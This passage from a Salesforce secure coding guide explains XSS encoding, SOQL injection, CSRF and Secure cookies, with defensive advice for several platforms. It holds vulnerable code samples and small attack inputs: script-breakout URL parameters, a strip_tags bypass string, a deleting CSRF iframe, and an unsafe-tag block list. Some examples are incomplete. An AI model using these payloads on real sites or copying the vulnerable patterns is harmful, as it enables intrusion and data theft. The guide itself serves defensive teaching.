    },
    {escape: false}
);
</script>
</apex:page>
Notice that when generating the logs, in one case the sample code applies html(js(result))
encoding, while in the other no encoding is applied, even though both are trying to do the same
thing: create an event handler that logs a user-controlled string to the console.
This is because in the first case, user data is serialized into a string which is passed to the HTML parser,
which, when parsed, includes an attribute value definition (serialized into another string) that is passed
to the JS parser. Therefore two layers of encoding are needed.
In the second case, the event handler was defined directly in javascript as a function and assigned to a
DOM property. Because no string serialization or de-serialization occurred, no client-side encoding was
required.
Avoiding Serialization
As each round of serialization and de-serialization creates a need for encoding, avoid serialization
whenever possible by using innerText rather than innerHTML, setAttribute rather than
string concatenation, and by defining event handlers directly in javascript rather than inline within the
html tag.
<script>
var payload = '{!JSENCODE($CurrentPage.parameters.xyz)}';
var el = document.createElement('div');
el.innerText = payload; //no HTML rendering, so no client-side encoding needed
$("#xyz").append(el);
</script>
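To illustrate the no-serialization case in isolation, here is a minimal sketch of an event handler defined directly in JavaScript. The helper name and the injected log function are illustrative (the log parameter simply stands in for console.log so the sketch runs outside a browser):

```javascript
// Sketch: a click handler defined directly in JavaScript (no inline HTML).
// Because the user string is never serialized into HTML and re-parsed,
// no HTMLENCODE/JSENCODE layer is needed. makeClickLogger is an
// illustrative helper, not a platform API.
function makeClickLogger(userData, log) {
  return function onClick() {
    // userData is used purely as a JS value; no parser ever re-reads it.
    log('You clicked: ' + userData);
  };
}
```

Even a hostile-looking string stays inert here, because it is only ever concatenated as data and never handed to an HTML or JS parser.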
If you are using a higher level API (such as the REST Toolkit or Mobile Toolkit), please examine the
documentation to determine what the encoding policies are, or examine the code to determine which
low level APIs are being invoked. For example, the ForceTk client uses the REST API, and therefore all
data is passed back raw:
<script>
var client = new forcetk.Client();
client.setSessionToken('{!$Api.Session_ID}');
client.query("SELECT Name FROM Account LIMIT 1", function(response){
$j('#accountname').html(response.records[0].Name); //vulnerable to
XSS
});
</script>
Taint can also enter through data pulled from any other remote source (e.g. window.postMessage,
XHR calls, and JSONP). Finally, taint sources can propagate through other DOM properties:
<apex:page>
<apex:includeScript value="{!$Resource.SecureFilters}"/>
<script>
//safe because no HTML rendering occurs
document.querySelector('#section1').innerText =
document.querySelector('#heading').innerText;
//encode before any later HTML rendering of the propagated value
secureFilters.html(document.querySelector('#section1').innerText);
</script>
</apex:page>
The DOM XSS Wiki contains a detailed list of sinks, sources, and sample code.
Javascript Micro Templates
Developers wanting to move more presentational logic to the client often make use of javascript
templating languages to handle html generation.
There are a large number of javascript micro-templating frameworks, roughly falling into two categories:
• logic-less frameworks such as mustache.js have their own domain specific language for iteration
and logical operations.
• embedded javascript frameworks such as underscore_js’s _template function use javascript to
perform iteration and logical operations with client-side merge-fields, obviating the need to learn
a DSL.
Nevertheless, none of the encoding or security concerns go away with these frameworks: developers
still need to be mindful of the type of data that is passed into the framework and the ultimate context
in which the data will be rendered in order to properly output-encode all variables. Additionally, they
need to study the built-in encoding options offered by the framework. Generally all frameworks have
support for some kind of HTML encoding, but the developer should verify that this includes escaping of
single and double quotes for rendering within HTML attributes.
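As a sketch of what such quote-aware HTML encoding looks like (an illustrative helper, not a substitute for a vetted library):

```javascript
// Sketch: a minimal HTML encoder that also escapes single and double quotes,
// making the output safe inside single- or double-quoted attribute values as
// well as element content. Illustrative only; prefer a vetted library.
function htmlAttrEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, function (ch) { return map[ch]; });
}
```

An encoder that stops at `&`, `<`, and `>` would still let an attacker break out of a quoted attribute value, which is exactly the gap to check for in a framework's built-in escaper.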
For rendering URLs, Javascript, or CSS, the developer is on their own and must either not render user-data
in these contexts or use a third party security library to properly escape output in all contexts other than
pure html.
One concern to keep in mind is that sometimes template data is stored in textarea tags with visibility
set to hidden. In this case, be aware that HTML rendering occurs when data is sent to a textarea field.
Finally, never place merge-fields into template data, as templates are invoked with eval(). Rather, use
merge-fields to define variables outside of your template, and then pass the variable reference to
the template.
Underscore Templates
All templates use innerHTML-style rendering, so developers must ensure that template variables are
encoded. Underscore templates support auto-HTML encoding with the <%- %> delimiter. No HTML
encoding is done with <%= %>, which should in general be avoided. However, HTML encoding alone is
generally insufficient, so these templates cannot be used securely unless you include additional
client-side encoding functions. The following example shows how to secure an underscore_js template
using the secure-filters library.
<apex:page >
<!-- vulnerable code -->
<apex:includeScript value="{!$Resource.jquery}"/>
<apex:includeScript value="{!$Resource.underscore}"/>
<apex:includeScript value="{!$Resource.SecureFilters}"/>
<apex:includeScript value="{!URLFOR($Resource.forcetk)}"/>
<div id='mainContainer'>content</div>
<script>
//compiled1 through compiled4 are underscore templates compiled earlier on the page
var client = new forcetk.Client();
client.setSessionToken('{!$Api.Session_ID}');
$(document).ready(function() {
    //tell client to wait a bit here..
    function render(name) {
        var record = {
            Id: "click me!",
            Name: name //for 2: \x22); alert(1); //
        };
        $('#mainContainer').empty();
        $('#mainContainer').append(compiled1(record)); //pops
        $('#mainContainer').append(compiled2(record)); //does not pop
        $('#mainContainer').append(compiled3(record)); //pops
        $('#mainContainer').append(compiled4(record)); //does not pop
    }
});
</script>
</apex:page>
Avoid Apache's StringEscapeUtils package, which was not designed for security encoding and should not
be used.
Dangerous Programming Constructs
The following mechanisms do not have built-in auto-HTML encoding protection and should in general
be avoided whenever possible.
S-Controls and Custom JavaScript Sources
The <apex:includeScript> Visualforce component allows you to include a custom script on
the page. In these cases be very careful to validate that the content is sanitized and does not include
user-supplied data. For example, the following snippet is extremely vulnerable because it uses
user-supplied input as the script source. The value provided to the tag is a URL to the JavaScript file
to include, so if an attacker can supply arbitrary data to this parameter (as in the example below), they
can potentially direct the victim to include any JavaScript file from any other web site.
<apex:includeScript value="{!$CurrentPage.parameters.userInput}" />
<a href="https://example.com/integration?sid={!$Api.Session_ID}&server={!$Api.Partner_Server_URL_130}">Go to portal</a>
Formula expressions can be function calls or include information about platform objects, a user’s
environment, system environment, and the request environment. An important feature of these
expressions is that data is not escaped during rendering. Since expressions are rendered on the server,
it is not possible to escape rendered data on the client using JavaScript or other client-side technology.
This can lead to potentially dangerous situations if the formula expression references non-system data
(i.e. potentially hostile or editable) and the expression itself is not wrapped in a function to escape the
output during rendering. A common vulnerability is created by the use of the {!$Request.*}
expression to access request parameters:
<html>
<head>
<title>{!$Request.title}</title>
</head>
<body>
Hello world!
</body>
</html>
This will cause the server to pull the title parameter from the request and embed it into the page. So,
the request
https://example.com/demo/hello.html?title=Hola
renders a page titled "Hola". An attacker can instead supply markup or script in the title parameter,
and it is embedded in the page unescaped.
The standard mechanism for server-side escaping is the JSENCODE, HTMLENCODE,
JSINHTMLENCODE, and URLENCODE functions, or the traditional SUBSTITUTE formula tag. Given the
placement of the {!$Request.*} expression in the example, the above attack can be prevented
by using the following HTMLENCODE call:
<html>
<head>
<title>
{!HTMLENCODE($Request.title)}
</title>
</head>
<body>
Hello world!
</body>
</html>
Depending on the placement of the tag and usage of the data, both the characters needing escaping
and their escaped counterparts may vary. For instance, this statement:
<script>var ret = "{!$Request.retURL}";</script>
would require that the double quote character be escaped with its URL-encoded equivalent %22
instead of the HTML-escaped &quot;, since the value is likely going to be used in a link. Otherwise, the
request
https://example.com/demo/redirect.html?retURL=xyz%22%3Balert('xss')%3B%2F%2F
breaks out of the string and executes the injected script.
Additionally, the ret variable may need additional client-side escaping later in the page if it is used in
a way which may cause included HTML control characters to be interpreted. Examples of correct usage
are below:
<script>
// Encode for URL
var ret = "{!URLENCODE($Request.retURL)}";
window.location.href = ret;
</script>
<script>
// Encode for JS variable that is later used in HTML operation
var title = "{!JSINHTMLENCODE($Request.title)}";
document.getElementById('titleHeader').innerHTML = title;
</script>
<script>
// Standard JSENCODE to embed in JS variable not later used in HTML
var pageNum = parseInt("{!JSENCODE($Request.PageNumber)}");
</script>
Formula tags can also be used to include platform object data. Although the data is taken directly from
the user’s org, it must still be escaped before use to prevent users from executing code in the context
of other users (potentially those with higher privilege levels.) While these types of attacks would need
to be performed by users within the same organization, they would undermine the organization’s user
roles and reduce the integrity of auditing records. Additionally, many organizations contain data which
has been imported from external sources, which may not have been screened for malicious content.
General Guidance for Other Platforms
This section briefly summarizes XSS best practices on other platforms.
Allowing HTML injection
If your application allows users to include HTML tags by design, you must exercise great caution in what
tags are allowed. The following tags may allow injection of script code directly or via attribute values
and should not be allowed. See HTML 5 Security Cheat Sheet for details.
Unsafe HTML Tags:
<applet> <body> <button> <embed> <form> <frame> <frameset> <html>
<iframe> <image> <ilayer> <input> <layer> <link> <math> <meta>
<object> <script> <style> <video>
Be aware that the above list cannot be exhaustive. Similarly, there is no complete list of JavaScript event
handler names (although see this page on Quirksmode), so there can be no perfect list of bad HTML
element attribute names.
Instead, it makes more sense to create a well-defined known-good subset of HTML elements and
attributes. Using your programming language’s HTML or XML parsing library, create an HTML input
handling routine that throws away all HTML elements and attributes not on the known-good list. This
way, you can still allow a wide range of text formatting options without taking on unnecessary XSS risk.
Creating such an input validator is usually around 100 lines of code in a language like Python or PHP; it
might be more in Java but is still very tractable.
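The known-good-subset approach can be sketched as follows. This toy filter assumes the HTML has already been turned into a simple node tree by a real parser; the tag and attribute allowlists, and the helper name, are illustrative:

```javascript
// Toy sketch of allowlist-based HTML filtering over a pre-parsed node tree.
// Nodes are either plain strings (text) or { tag, attrs, children } objects.
const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'p', 'ul', 'li']);
const ALLOWED_ATTRS = new Set(['title']);

function filterTree(node) {
  if (typeof node === 'string') return node;      // plain text is kept
  if (!ALLOWED_TAGS.has(node.tag)) return '';     // unknown tags are dropped
  const attrs = {};
  for (const key of Object.keys(node.attrs || {})) {
    if (ALLOWED_ATTRS.has(key)) attrs[key] = node.attrs[key]; // unknown attributes dropped
  }
  const children = (node.children || [])
    .map(function (child) { return filterTree(child); })
    .filter(function (child) { return child !== ''; });
  return { tag: node.tag, attrs: attrs, children: children };
}
```

Because everything not explicitly allowed is discarded, new dangerous tags and event-handler attributes are rejected by default rather than requiring an ever-growing blocklist.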
HTTP Only Cookies
When possible, set the HttpOnly attribute on your cookies. This flag tells the browser to reveal the cookie
only over HTTP or HTTPS connections, but to have document.cookie evaluate to a blank string when
JavaScript code tries to read it. (Some browsers do still let JavaScript code overwrite or append to
document.cookie, however.) If your application does require the ability for JavaScript to read the cookie,
then you won’t be able to set HttpOnly. Otherwise, you might as well set this flag.
Note that HttpOnly is not a defense against XSS, it is only a way to briefly slow down attackers exploiting
XSS with the simplest possible attack payloads. It is not a bug or vulnerability for the HttpOnly flag to be
absent.
Stored XSS Resulting from Arbitrary User Uploaded Content
Applications such as Content Management, Email Marketing, etc. may need to allow legitimate users to
create and/or upload custom HTML, Javascript or files. This feature could be misused to launch XSS
attacks. For instance, a lower privileged user could attack an administrator by creating a malicious HTML
file that steals session cookies. The recommended protection is to serve such arbitrary content from a
separate domain outside of the session cookie's scope.
Let’s say cookies are scoped to https://app.site.com. Even if customers can upload arbitrary
content, you can always serve the content from an alternate domain that is outside of the scoping of
any trusted cookies (session cookies and other sensitive information). As an example, pages on
https://app.site.com would reference customer-uploaded HTML templates as IFRAMES using
a link to
https://content.site.com/cust1/templates?templId=13&auth=someRandomAuthenticationToken
The authentication token would substitute for the session cookie since sessions scoped to
app.site.com would not be sent to content.site.com. If the data being stored is sensitive, a one
time use or short lived token should be used. This is the method that Salesforce uses for our content
product.
HTTP Response Splitting
HTTP response splitting is a vulnerability closely related to XSS, and for which the same defensive strategies
apply. Response splitting occurs when user data is inserted into an HTTP header returned to the client.
Instead of inserting malicious script, the attack is to insert additional newline characters. Because headers
and the response body are delimited by newlines in HTTP, this allows the attacker to insert their own
headers and even construct their own page body (which might have an XSS payload inside). To prevent
HTTP response splitting, filter ‘\n’ and ‘\r’ from any output used in an HTTP header.
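A minimal sketch of that filtering step (most modern server frameworks already reject such header values, so this just illustrates the idea; the helper name is ours):

```javascript
// Sketch: strip CR and LF from any value placed in an HTTP header so an
// attacker cannot terminate the header line and inject their own headers
// or response body.
function sanitizeHeaderValue(value) {
  return String(value).replace(/[\r\n]/g, '');
}
```

Stripping (or rejecting) rather than encoding is appropriate here, since a legitimate header value never contains a bare CR or LF.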
ASP.NET
ASP.NET provides several built-in mechanisms to help prevent XSS, and Microsoft supplies several free
tools for identifying and preventing XSS in sites built with .NET technology.
An excellent general discussion of preventing XSS in ASP.NET 1.1 and 2.0 can be found at the Microsoft
Patterns & Practices site: How To: Prevent Cross-Site Scripting in ASP.NET
By default, ASP.NET enables request validation on all pages, to prevent accepting of input containing
unencoded HTML. (For more details see http://www.asp.net/learn/whitepapers/request-validation/.)
Verify in your Machine.config and Web.config that you have not disabled request validation.
Identify and correct any pages that may have disabled it individually by searching for the
ValidateRequest request attribute in the page declaration tag. If this attribute is not present, it
defaults to true.
Input Validation
For server controls in ASP.NET, it is simple to add server-side input validation using
<asp:RegularExpressionValidator>.
If you are not using server controls, you can use the Regex class in the
System.Text.RegularExpressions namespace or use other supporting classes for validation.
For example regular expressions and tips on other validation routines for numbers, dates, and URL strings,
see Microsoft Patterns & Practices: “How To: Protect from Injection Attacks in ASP.NET”.
Output Filtering & Encoding
The System.Web.HttpUtility class provides convenient methods, HtmlEncode and
UrlEncode for escaping output to pages. These methods are safe, but follow a “blocklist” approach
that encodes only a few characters known to be dangerous. Microsoft also makes available the AntiXSS
Library that follows a more restrictive approach, encoding all characters not in an extensive,
internationalized allowlist.
Tools and Testing
Microsoft provides a free static analysis tool, CAT.NET. CAT.NET is a snap-in to Visual Studio that helps
identify XSS as well as several other classes of security flaws. Visual Studio has built-in static analysis
features that can help identify security vulnerabilities:
https://learn.microsoft.com/en-us/visualstudio/code-quality/overview-of-code-analysis-for-managed-code
Java
J2EE web applications have perhaps the greatest diversity of frameworks available for handling user
input and creating pages. Several strong, all-purpose libraries are available, but it is important to
understand what your particular platform provides.
Input Filtering
Take advantage of built-in framework tools to validate input as it is being used to generate business or
model objects. In Struts, input validation rules can be defined in XML using the Validator Plugin in your
struts-config.xml:
<plug-in className="org.apache.struts.validator.ValidatorPlugIn">
<set-property property="pathnames"
value="/WEB-INF/validator-rules.xml"/>
</plug-in>
Or you can build programmatic validation directly into your form beans with regular expressions.
Learn more about Java regular expressions here: Java Regex Documentation.
The Spring Framework also provides utilities for building automatic validation into data binding. You
can implement the org.springframework.validation.Validator interface with the
help of Spring’s ValidationUtils class to protect your business objects. Get more information
here: Spring Validation.
A more generic approach, applicable to any kind of Java object, is presented by the OVal object validation
framework. OVal allows constraints on objects to be declared with annotations, through POJOs or in
XML, and expressing custom constraints as Java classes or in a variety of scripting languages. The system
is quite powerful, implements Programming by Contract features using AspectJ, and provides some
built-in support for frameworks like Spring. Learn more about OVal at: OVal
Output Filtering and Encoding
JSTL tags such as <c:out> have the escapeXml attribute set to true by default. This default behavior
ensures that HTML special characters are entity-encoded and prevents many XSS attacks. If any tags in
your application set escapeXml="false" (such as for outputting the Japanese yen symbol) you
need to apply some other escaping strategy. For JSF, the tag attribute is escape, and is also set to true
by default for <h:outputText> and <h:outputFormat>.
Other page generation systems do not always escape output by default. Freemarker is one example. All
application data included in a Freemarker template should be surrounded with an <#escape> directive
to do output encoding (e.g. <#escape x as x?html>) or by manually adding ?html (or
?js_string for JavaScript contexts) to each expression (e.g. ${username?html}).
Custom JSP tags or direct inclusion of user data variables with JSP expressions (e.g. <%=
request.getHeader("HTTP_REFERER") %>) or scriptlets (e.g. <%
out.println(request.getHeader("HTTP_REFERER")); %>) should be avoided.
If you are using a custom page-generation system, one that does not provide output escaping
mechanisms, or building directly with scriptlets, there are several output encoding libraries available.
The OWASP Enterprise Security API for Java is a mature project that offers a variety of security services
to J2EE applications. The org.owasp.esapi.codecs package provides classes for safely encoding
output strings for HTML, JavaScript, and several other contexts. Get it here: OWASP Enterprise
Security API (ESAPI)
PHP
Input Filtering
As of PHP 5.2.0, data filtering is a part of the PHP Core. The package documentation is available at: PHP
Data Filtering Library.
Two types of filters can be declared: sanitization filters that strip or encode certain characters, and
validation filters that can apply business logic rules to inputs.
Output Encoding
PHP provides two built-in string functions for encoding HTML output. htmlspecialchars encodes
only &, ", <, and > (and ' when the ENT_QUOTES flag is passed), while htmlentities encodes all
characters that have defined HTML entities.
For bulletin-board like functionality where HTML content is intended to be included in output, the
strip_tags function is also available to return a string with all HTML and PHP tags removed, but
because this function is implemented with a regex that does not validate that incoming strings are
well-formed HTML, partial or broken tags may be able to bypass the system. For example, the string
<<b>script>alert('xss');<</b>/script> might have the <b> and </b> tags
removed, leaving the vulnerable string <script>alert('xss');</script>. If you are going
to rely on this function, input must be sent to an HTML validating and tidying program first. (Note that
in PHP 5.2.6, strip_tags does appear to work, reducing the aforementioned attack string to
alert('xss'). Does it work in your version?)
CHAPTER 4 Secure Coding SQL Injection
Understand how SOQL injection works and how to secure SOQL Queries.
Sample Vulnerability
Consider this code in an Apex controller that constructs a SOQL query to retrieve information about a
custom object in Salesforce called Personnel. The userInputTitle variable is user input from a
web page form, and is concatenated into the query string's WHERE clause to form the final request to
the database.
public List<Personnel__c> whereclause_records { get; set; }
public String userInputTitle { get; set; }

public PageReference queryPersonnel() {
    if (!Schema.sObjectType.Personnel__c.fields.Name.isAccessible() ||
        !Schema.sObjectType.Personnel__c.fields.Role__c.isAccessible() ||
        !Schema.sObjectType.Personnel__c.fields.Title__c.isAccessible() ||
        !Schema.sObjectType.Personnel__c.fields.Age__c.isAccessible()) {
        return null; // You might want to handle this more gracefully
    }
    // Vulnerable: user input is concatenated directly into the query string
    String queryString = 'SELECT Name, Role__c, Title__c, Age__c FROM Personnel__c ' +
        'WHERE Title__c LIKE \'%' + userInputTitle + '%\'';
    whereclause_records = Database.query(queryString);
    return null;
}
The %' finishes up the wildcard matching for Title__c and ends the string. The user input appends
to the query, adding a filter for the performance rating of the Personnel object. The attacker’s string has
now changed the way the query is behaving and gives them access to information that the developer
didn’t intend.
SOQL injection can be seen as a bypass of CRUD and FLS checks. Since the only action SOQL supports is
SELECT, the worst that can happen is that a user gains access to data that they shouldn't be able to see.
Even so, failing to check a user's access levels before returning data can have a significant impact.
Is My Application Vulnerable?
When you build dynamic queries without bind variables (also known as parameterized queries), your
application becomes vulnerable to SOQL injection. To keep your data safe, always use parameterized
queries when working with dynamic input.
public PageReference queryPersonnel() {
    if (!Schema.sObjectType.Personnel__c.fields.Name.isAccessible() ||
        !Schema.sObjectType.Personnel__c.fields.Role__c.isAccessible() ||
        !Schema.sObjectType.Personnel__c.fields.Title__c.isAccessible() ||
        !Schema.sObjectType.Personnel__c.fields.Age__c.isAccessible()) {
        return null;
    }
    String qTitle = '%' + userInputTitle + '%';
    whereclause_records = [SELECT Name, Role__c, Title__c, Age__c
        FROM Personnel__c
        WHERE Title__c LIKE :qTitle];
    return null;
}
You’ll notice there’s less code here than in our manual example. In Apex, writing a query inside square
brackets executes it directly, without calling Database.query(). The variable prefixed with a colon
is a bind variable: the database layer, which in this case is SOQL, treats everything in that variable as
data, even if it contains unusual characters. No matter what the user types in, they can’t break out of
the intended behavior of the query or manipulate it.
Parameterized queries are limited to binding a variable inside the WHERE clause of the query. This means
that if you want dynamic fields or object names, you can’t replace your dynamic query with a
parameterized one. So, how can you make sure that your queries are safe? In Apex, you can write a
sanitizing function:
public boolean isSafeObject(String objName) {
    Map<String, Schema.SObjectType> schemaMap = Schema.getGlobalDescribe();
    Schema.SObjectType myObj = schemaMap.get(objName);
    return myObj != null && myObj.getDescribe().isAccessible();
}

public List<SObject> queryRecords(String objName, String myQuery) {
    if (!isSafeObject(objName)) {
        return null;
    }
    if (!Schema.getGlobalDescribe().get(objName).fields.getMap().get('Name').isAccessible() ||
        !Schema.getGlobalDescribe().get(objName).fields.getMap().get('Address').isAccessible()) {
        return null;
    }
    List<SObject> records = Database.query(myQuery);
    return records;
}
Ensure that the object name provided by the user is valid and that the user has the necessary access
permissions. Check for any invalid characters that could be used for SOQL injection and confirm that the
user has access to the object. This not only protects against SOQL injection but also serves as a CRUD
check.
As previously mentioned, SOQL injection can be seen as another form of CRUD/FLS bypass. However,
there’s one final customization scenario for your SOQL queries to consider. If you know the object and
the filtering criteria, but don’t know in advance which field you must access, the scenario is similar to
this code:
public boolean isSafeField(String fieldName, String objName) {
    Map<String, Schema.SObjectType> schemaMap = Schema.getGlobalDescribe();
    Schema.SObjectType myObj = schemaMap.get(objName);
    if (myObj == null) {
        return false;
    }
    // Verify the field exists and is accessible before using it to build a query and perform logic
    Schema.SObjectField myField = myObj.getDescribe().fields.getMap().get(fieldName);
    return myField != null && myField.getDescribe().isAccessible();
}
Again, in this example, we’ve not only prevented SOQL injection but also carried out our CRUD
and FLS checks for the object and the associated fields.
Use the methods that we’ve discussed so far wherever they apply. Sticking to these patterns, rather than
inventing alternative defenses, gives you the best chance of preventing SOQL injection. However, for
other languages and frameworks that lack the APIs that Salesforce provides, we’ll briefly cover other
sanitization methods.
Typecasting: Cast user input to the expected data type, such as boolean or integer. If there's an issue
converting data types, it means the data is wrong, and you can then safely stop the process.

Whitelisting is similar, if you have an input that you know the structure of. For example, you can select
fields from an object by verifying user input against a predefined list of field names.

Typecasting example:
String query = 'SELECT Name, Address FROM Object__c WHERE isActive = ' + (input ? 'TRUE' : 'FALSE');

Whitelisting example:
Set<String> fields = new Set<String>();
fields.add('myField1');
fields.add('myField2');
fields.add('myField3');
if (!fields.contains(inputField)) {
    throw new CustomException('Invalid field: ' + inputField); // Customize error handling as needed
}
These methods are good for preventing injection attacks, but don’t guarantee that the user will have
access to the objects returned. Hence we also don’t recommend using these methods except in edge
cases.
When end users query via the API, the platform enforces CRUD/FLS and sharing rules, so users only
receive records and fields they have access to. In contrast, when making SOQL calls in Apex code, no
CRUD/FLS checks are performed (and sharing checks are only performed if the 'with sharing' keyword
is used). Allowing end users to control the contents of a SOQL query issued in Apex code is therefore a
serious security vulnerability, while end users controlling the contents of a SOQL query via the API is not.
PHP (PDO)
• Use the PHP Data Objects (PDO) extension for parameterized queries and prepared statements.
Note that PDO::prepare provides good SQL injection defenses, but this only guarantees protection
if the underlying PDO driver and database support parameterized queries natively.
• Always sanitize data before passing it to PDO::prepare as a defense-in-depth measure.
• Use regular expressions to limit input values to expected formats.
Reference: PHP Security guidance for Prepared Statements and Stored Procedures.
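The regular-expression suggestion above can be sketched in Java; the patterns below are illustrative assumptions about what a "valid" field name or ZIP code looks like, and should be adapted to your own inputs:

```java
import java.util.regex.Pattern;

public class InputFormats {
    // Illustrative allowlist patterns; matches() anchors to the whole string,
    // so trailing injection payloads cannot sneak past the check.
    static final Pattern FIELD_NAME = Pattern.compile("[A-Za-z][A-Za-z0-9_]{0,39}");
    static final Pattern US_ZIP = Pattern.compile("\\d{5}(-\\d{4})?");

    public static boolean isValidFieldName(String s) {
        return s != null && FIELD_NAME.matcher(s).matches();
    }

    public static boolean isValidZip(String s) {
        return s != null && US_ZIP.matcher(s).matches();
    }
}
```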
Stored procedures that only use static SQL text are also acceptable, but beware of stored procedures
that use exec or similar constructs to build dynamic SQL internally.
CHAPTER 5 Secure Coding Cross Site Request Forgery
Learn how to protect yourself from Cross-site Request Forgery (CSRF), a security threat where malicious
websites can manipulate your browser to perform actions without your consent on other sites where
you are logged in.
Sample Vulnerability
Consider a hypothetical contact management application at https://example.com/. Without CSRF
protection, if a user visits a malicious website while still logged in to example.com, the following HTML
in the malicious site’s page can cause all of their contacts to be deleted.
<iframe
src="https://example.com/addressBook?action=deleteAll&confirm=yes">
Is My Application Vulnerable?
All web applications are vulnerable to CSRF by default. Unless you have specifically engineered protections
or are automatically protected by your framework, your application is probably vulnerable. Applications
built on the Apex and Visualforce platforms are protected by default. Anti-CSRF protections are available
for most major application platforms but are often not enabled by default.
This screen shot of the Burp proxy shows an example of a request vulnerable to CSRF. All of the parameters
to the application (action, confirm) are predictable.
The next screen shot has a parameter named antiForgery that looks hard to guess:
But if we log out as “bob” and log back in as “charlie”, we see that the antiForgery value stays the same.
This application-global anti-forgery token could be observed by one user and used to attack other users.
A secure anti-CSRF mechanism should create a different, unpredictable token for each user session:
Bob should get a different antiForgery value each time he logs in, and so should Charlie. Be sure to
use the capabilities of the proxy to test that actions fail if the token is removed or changed, or if a
valid token for another user is substituted.
Additional information on testing for CSRF can be found at:
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)
(By protecting only POST requests, Salesforce follows the convention and recommendation that GET
requests be safe in that they do not alter significant data on the server side or have other significant
side-effects. That is, you should not be using GET requests to change application state, and so GET
requests should not need CSRF protection. See Section 9.1 of RFC 2616, HTTP 1.1 for more discussion of
this distinction.)
By formulating a non-safe action as a GET request, a developer might bypass our built-in
defenses without realizing the risk. For example, let's say you have a custom controller where you take
the object ID as an input parameter, use that input parameter in your own SOQL call, and then
delete the resulting object (a non-safe, state-changing action). Consider the following Visualforce code
snippet:
<apex:page controller="myClass" action="{!init}"></apex:page>
In this case, the developer has unknowingly bypassed the anti-CSRF controls by writing code that changes
state on a GET request. The id parameter is read and used in the code. The anti-CSRF token is never
read or validated. An attacker web page may have sent the user to this page via CSRF attack and could
have provided any value they wish for the id parameter.
Instead, use an <apex:form> block, as described in the developer documentation. Note how it is
safe to use getParameters to select the account, but that the update account; statement — a
non-safe state change — is done in an <apex:form> action. The form is POSTed and the anti-forgery
token validated implicitly.
public with sharing class MyController {
    public Account account { get; set; }

    public MyController() {
        account = [SELECT Id, Name, Site FROM Account
            WHERE Id = :ApexPages.currentPage().getParameters().get('id')];
    }

    public void updateAccount() {
        // Non-safe state change: invoked from an <apex:form> action (POST),
        // so the anti-CSRF token is validated implicitly.
        update account;
    }
}
General Guidance
All requests that create, update or delete data or have side-effects require protection against CSRF.
The most reliable method is to include an anti-CSRF token as a hidden input with every application
action.
This token should be included in all forms built by the genuine application and validated to be present
and correct before form data is accepted and acted upon.
Use the POST method for requests requiring protection to avoid disclosing the token value in Referer
headers.
Token values must be unique per user session and unpredictable.
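These requirements can be sketched with the Java standard library alone. The class below is our own minimal illustration, not a substitute for your framework's built-in CSRF protection: generate one token per session, embed it in each form, and validate it in constant time:

```java
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;

public class CsrfToken {
    private static final SecureRandom RANDOM = new SecureRandom();

    // Generate a fresh, unpredictable token once per user session.
    public static String newToken() {
        byte[] bytes = new byte[32];
        RANDOM.nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }

    // Compare the submitted token against the session's token in constant
    // time, so the comparison itself doesn't leak how many bytes matched.
    public static boolean isValid(String sessionToken, String submittedToken) {
        if (sessionToken == null || submittedToken == null) {
            return false;
        }
        return MessageDigest.isEqual(sessionToken.getBytes(), submittedToken.getBytes());
    }
}
```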
For more information and traditional defenses, see the following articles:
• http://www.owasp.org/index.php/Cross-Site_Request_Forgery
• http://www.cgisecurity.com/csrf-faq.html
ASP.NET
ASP.NET provides two strategies for preventing CSRF. Applications that use the ASP.NET ViewState
mechanism can protect against CSRF by setting a ViewStateUserKey during Page_Init.
Be sure to set the value to a per-user, unique, and unpredictable value. See the following articles at
MSDN for more information on using ViewStateUserKey:
• http://msdn.microsoft.com/en-us/library/system.web.ui.page.viewstateuserkey.aspx
• http://msdn.microsoft.com/en-us/library/ms972969.aspx
ASP.NET applications that do not use the ViewState mechanism can use the AntiForgeryToken
feature from the System.Web.Mvc package. See the following MSDN documentation:
• http://msdn.microsoft.com/en-us/library/system.web.mvc.htmlhelper.antiforgerytoken.aspx
If using the AntiForgeryToken, it must be added to and validated for every sensitive action in the
application. Again, a “sensitive” action for these purposes is one that changes server-side state, like
creating, updating, or deleting data.
Java
Several libraries are available for protecting Java applications from CSRF. The HDIV (HTTP Data Integrity
Validator) framework’s Anti-Cross Site Request Forgery Token feature can be easily integrated into Struts
1.x, Struts 2.x, Spring MVC and JSTL applications. The Spring Webflow system includes a unique identifier
with each request, but this identifier is not sufficiently random to provide CSRF protection, so HDIV
is recommended instead; it can be downloaded from the project's website.
CHAPTER 6 Secure Coding Secure Communications
Learn how to ensure application security outside Salesforce: mandate HTTPS and set the Secure flag
for cookies that store sensitive data.
Sample Vulnerability
Failure to set the Secure flag for security-critical cookies is the most common vulnerability in this category.
Simply setting a cookie over an HTTPS connection doesn’t prevent it from being returned over HTTP
unless the Secure flag is set. Even if your site doesn’t have an HTTP version, malicious parties on the network
will be able to steal session cookies.
For example, the attacker can insert references to HTTP URLs to your application into sites that your users
are likely to visit. Assume your application is https://app.example.com, and your users frequent a discussion
forum or blog at http://exampleappblog.com. ExampleAppBlog allows commenters to include limited
HTML in their posts, including img tags. A commenter inserts HTML into one of their comments like the
following:
<img src="http://app.example.com/example-logo.png" />
When a user authenticated to app.example.com views this comment, their browser fires off a request
for example-logo.png over an insecure HTTP connection. Since the app.example.com cookie wasn't set
Secure, the browser includes the cookie over this connection, exposing it to the network.
Suppose you log into your website's CMS over an insecure public Wi-Fi network at a coffee shop; an
attacker on the same network could perform a man-in-the-middle (MITM) attack. Logging into your
site over HTTP without the Secure flag enabled allows attackers to steal your cookie. Even with HTTPS,
attackers can sometimes downgrade your connection to HTTP using SSL stripping.
Is My Application Vulnerable?
After logging in, change the “https” in the URL bar of the browser to “http”. If you’re still logged in, your
application is vulnerable.
Follow these simple test procedures for all applications to determine whether they follow the guidelines:
• Session cookies that authenticate a user to the application must always be marked Secure.
• Examine the contents of any cookies not marked Secure. Do they contain information that is
sensitive or personally identifiable (such as an email address), or that influences the behavior of the
application? For any such cookies, the server must set the Secure flag.
You can easily test web server configuration for HTTPS using the online tool provided by SSL Labs at
https://www.ssllabs.com/ssldb/. Simply type in the URL for your server to get a detailed report.
If your assessment shows severe errors in the SSL Labs assessment, they must be corrected before your
site can be integrated with AppExchange.
